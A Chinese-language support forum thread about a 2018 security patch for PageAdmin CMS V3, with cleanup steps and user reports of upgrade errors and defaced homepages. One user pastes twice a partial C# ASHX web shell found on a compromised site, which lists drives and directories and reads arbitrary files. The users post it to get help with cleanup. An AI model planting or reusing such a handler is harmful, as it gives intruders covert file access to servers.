PageAdmin网站内容管理系统(CMS)交流论坛
xiyou - 2018/11/24 15:40:51
PageAdmin V3用户论坛反馈了一些问题,经过和一些v3用户的确认,官方现在发布最新的升级补丁,补丁修复了目前反馈的各种问题,同时为了感谢大家对PageAdmin 3.0的支持,系统取消了
顶部版权信息以表示感谢广大的V3用户的支持。
目前有用户论坛反映我们放弃V3用户,我们要声明,我们尊重和感谢每个客户,
因为大家的使用支持,pageadmin才能坚持了十年有余。不断开发更好更优秀的网站管理系统一直是我们不懈的追求,由于以下原因,V3已经停止功能更新。
V3采用微软最早的webform框架,至从微软发布Mvc框架后,Mvc已经是未来web的发展方向,v3功能更新已经没有任何意义,但如有各种bug反馈,我们会发布补丁进行修复。
目前v3.0的各种问题经过确认和检测,整理成v3.0 20181124补丁,大家及时下载并更新,并大家及时按以下说明处理。
v3.0 20181124补丁下载地址:
update-2018-11-24.zip更新方法:
1、升级前先备份一下网站文件。
2、由于很多客户都是老版本升级过来的,文件中存在一些无效的文件,有些文件存在Bug,请务必删除 /e/incs/fckeditor 这个目录,这个目录是最开始版本用的编辑器,存在上传漏洞
3、如果你目前网站修改了后台目录,请先改回默认的master名称,然后下载升级包,解压覆盖文件后再把master名称改回去。
4、搜索整个网站目录,查找 *.asp *.asa *.php这几种后缀的文件, 搜索到后直接删除(在操作系统中系统文件和隐藏文件都设置为可显示)
5、搜索/e/upload目录,查找这几种后缀格式的文件: *.asp *.asa *.html *.htm * *.aspx *.ashx *.php 搜索到后直接删除。
6、更改你的后台默认master目录,和修改后台密码
最后感谢大家,使用中如有任何问题,请及时论坛反馈,谢谢!
升级后常见问题:
http://bbs.pageadmin.net/showtopic-58259.aspxhttp://bbs.pageadmin.net/showtopic-58258.aspx
xtjindian - 2018/11/24 16:45:59
查找 *.asp *.asa这两种后缀的文件, 搜索到后直接删除
那网站还能打开吗
xiyou - 2018/11/24 17:10:47
回复 2楼xtjindian的帖子可以的,pageadmin的文件后缀是*.aspx 或*.ashx 这两种别删除就不影响
glxxjyf - 2018/11/24 20:27:35
用老版的站长又能多坚持一段时间了
cnylj - 2018/11/26 8:14:03
升级后报错!!!
Compilation Error
Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately.
Compiler Error Message: CS0234: The type or namespace name 'Member_Valicate' does not exist in the namespace 'PageAdmin' (are you missing an assembly reference?)
代码中调用了PageAdmin.Member_Valicate MC=new PageAdmin.Member_Valicate(); //实例化会员登陆对象 请问怎么解决?
myfly99 - 2018/11/26 9:06:42
“/”应用程序中的服务器错误。
未将对象引用设置到对象的实例。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.NullReferenceException: 未将对象引用设置到对象的实例。
源错误:
只有在调试模式下进行编译时,生成此未处理异常的源代码才会显示出来。若要启用此功能,请执行以下步骤之一,然后请求 URL:
1. 在产生错误的文件的顶部添加一条“Debug=true”指令。例如:
<%@ Page Language="C#" Debug="true" %>
或:
2. 将以下的节添加到应用程序的配置文件中:
<configuration>
<system.web>
<compilation debug="true"/>
</system.web>
</configuration>
请注意,第二个步骤将使给定应用程序中的所有文件在调试模式下进行编译;第一个步骤仅使该特定文件在调试模式下进行编译。
重要事项: 以调试模式运行应用程序一定会产生内存/性能系统开销。在部署到生产方案之前,应确保应用程序调试已禁用。
堆栈跟踪:
[NullReferenceException: 未将对象引用设置到对象的实例。]
PageAdmin.Conn.OleDbConn() +115
PageAdmin.lanmu.Load_PageAdmin(Int32 SiteId, Int32 Lanmu_Id, Int32 SubLanmu_Id) +488
ASP.index_aspx.OnInit(EventArgs e) +14
System.Web.UI.Control.InitRecursive(Control namingContainer) +333
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +378
版本信息: Microsoft .NET Framework 版本:2.0.50727.8793; ASP.NET 版本:2.0.50727.8762
45460 - 2018/11/26 21:59:47
升级到20181124版本后出现前台会员不能登录的错误,请抽空处理一下。
myxue - 2018/11/28 14:04:11
[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256.aspx#163643]1楼[color=olive]xiyou[/color]的帖子[/url][/b]
我是贵公司标准版用户,想请教个问题,这次的补丁包,是否修复了以下问题:
1.Cookie SQL注入
2.Header SQL注入
3.SQL盲注 (基于时间) SQL盲注 (基于真假)表单绕过
4.弱口令
5.服务端调试信息泄漏
6.密码字段自动完成
aidemeirixi - 2018/11/28 15:18:01
升级了 xiyou 老大 感谢 感谢
xiyou - 2018/11/29 10:09:43
回复 8楼myxue的帖子网站程序一般都是注入问题和上传漏洞,这些问题已经修复,其他问题可通过修改配置文件或服务器配置,如果对网站安全性要求高,请升级4.0.
aidemeirixi - 2018/11/29 14:14:52
老大 升级是运行 域名+update.aspx 吗? 补丁包里的 update.aspx 文件是空的啊 还是仅仅覆盖即可?
xiyou - 2018/11/29 14:23:07
haitaofan - 2018/11/30 10:51:21
回复 1楼xiyou的帖子老大,4.0什么时间可以升级?
e0398 - 2018/11/30 22:52:12
最新补丁打上后 网站频繁被修改主页或者删除主页文件。
myxue - 2018/12/1 15:35:32
[b]回复 [url=http://bbs.pageadmin.net/postreply.aspx?topicid=58256&forumpage=1&postid=&postlayer=14&poster=e0398#-1]14楼[color=olive]e0398[/color]的帖子[/url][/b]
同样问题,主页被修改:O
e0398 - 2018/12/1 16:29:05
.ashx 文件是否要全部删除你?
xiyou - 2018/12/1 16:40:05
回复 14楼e0398的帖子出现这个问题那就是因为木马没有清理干净导致的
lolchina - 2018/12/3 15:15:43
必须要赞!!!祝PA越来越好
qb211 - 2018/12/4 9:03:06
升级后主页还是能被攻击
e0398 - 2018/12/6 9:59:05
总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。
文件的代码如下:
“
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- using System.Net;
- using System.Text;
- using System.Data;
- using System.Data.SqlClient;
- using System.Diagnostics;
- public class Handler : IHttpHandler
- {
- public void ProcessRequest(HttpContext context)
- {
- String Z = context.Request.Form["@"];//
- if (Z != "")
- {
- String Z1 = context.Request.Form["Z1"];
- String Z2 = context.Request.Form["Z2"];
- String R = "";
- try
- {
- switch (Z)
- {
- case "A":
- {
- String[] c = Directory.GetLogicalDrives();
- R = String.Format("{0}\t", context.Server.MapPath("/"));
- for (int i = 0; i < c.Length; i++)
- R += c[i][0] + ":";
- break;
- }
- case "B":
- {
- DirectoryInfo m = new DirectoryInfo(Z1);
- foreach (DirectoryInfo D in m.GetDirectories())
- {
- R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
- }
- foreach (FileInfo D in m.GetFiles())
- {
- R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
- }
- break;
- }
- case "C":
- {
- StreamReader m = new StreamReader(Z1, Encoding.Default);
- R = m.ReadToEnd();
- m.Close();
- break;
- }
- case "D":
- {
- 其他代码省略...
”
e0398 - 2018/12/6 10:25:43
回复 17楼xiyou的帖子总是被上传 ashx.ashx 以及 ashx_?.ashx 的文件。
文件的代码如下:
“
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- using System.Net;
- using System.Text;
- using System.Data;
- using System.Data.SqlClient;
- using System.Diagnostics;
- public class Handler : IHttpHandler
- {
- public void ProcessRequest(HttpContext context)
- {
- String Z = context.Request.Form["@"];//
- if (Z != "")
- {
- String Z1 = context.Request.Form["Z1"];
- String Z2 = context.Request.Form["Z2"];
- String R = "";
- try
- {
- switch (Z)
- {
- case "A":
- {
- String[] c = Directory.GetLogicalDrives();
- R = String.Format("{0}\t", context.Server.MapPath("/"));
- for (int i = 0; i < c.Length; i++)
- R += c[i][0] + ":";
- break;
- }
- case "B":
- {
- DirectoryInfo m = new DirectoryInfo(Z1);
- foreach (DirectoryInfo D in m.GetDirectories())
- {
- R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
- }
- foreach (FileInfo D in m.GetFiles())
- {
- R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
- }
- break;
- }
- case "C":
- {
- StreamReader m = new StreamReader(Z1, Encoding.Default);
- R = m.ReadToEnd();
- m.Close();
- break;
- }
- case "D":
- {
- 其他代码省略...
”
xiyou - 2018/12/6 10:39:30
回复 21楼e0398的帖子这种情况遇到很多用户,因为之前上传的木马伪装成aspx文件了,没有清理干净
zhao0427 - 2018/12/6 10:44:42
能详细介绍下打补丁过程么,看不懂,不会弄
e0398 - 2018/12/6 11:05:39
回复 22楼xiyou的帖子好的,我逐一查询所有代码。
ashx.ashx 这样的文件是木马吧?
schhd - 2018/12/7 15:44:56
[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256-2.aspx#163732]22楼[color=Olive]xiyou[/color]的帖子[/url][/b]
有打好补丁的最新的3.0源码吗?我们可以逐一对比一下,找出伪装的木马文件!或者有其它的更便捷的方法!
yishan5 - 2018/12/10 16:48:01
Server Error in '/' Application.
zdy_location
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.IndexOutOfRangeException: zdy_location
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[IndexOutOfRangeException: zdy_location]
System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName) +5002922
System.Data.OleDb.OleDbDataReader.GetOrdinal(String name) +68
System.Data.OleDb.OleDbDataReader.get_Item(String name) +15
PageAdmin.set.Get_Data() +1514
PageAdmin.set.Page_Load(Object src, EventArgs e) +414
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +91
System.Web.UI.Control.LoadRecursive() +74
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2207
后台能进,但是不能更新,点击网站管理里的“网站参数设置”就上面这样了,请赐教!
BA1AK - 2018/12/11 13:36:56
[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256.aspx#163643]1楼[color=Olive]xiyou[/color]的帖子[/url][/b]
求助,升级后,显示正常,后台无法登录了,症状是没有验证码,请问如何解决?
夏天2018 - 2018/12/11 15:27:38
验证码的地方右击看看图片在不在,是不是升级的时候验证码的图片是不是丢失。
BA1AK - 2018/12/11 16:36:58
[b]回复 [url=http://bbs.pageadmin.net/showtopic-58256-2.aspx#163784]28楼[color=Olive]夏天2018[/color]的帖子[/url][/b]
验证码图片就没有,也没有xxx
panyifan - 2018/12/17 12:26:27
PageAdmin V3用户论坛反馈了一些问题,经过和一些v3用户的确认,官方现在发布最新的升级补丁,补丁修复了目前反馈的各种问题,同时为了感谢大家对PageAdmin 3.0的支持,系统取消了顶部版权信息以表示感谢广大的V3用户的支持。
中毒了,网站不能正常进入,后台也进不了,升级了新补丁,知道后面情况会怎么样,
另外 顶部版权信息 还是有的,没有取消
这样 还是很容易被 抓取到,然后受到攻击。
:!:!:!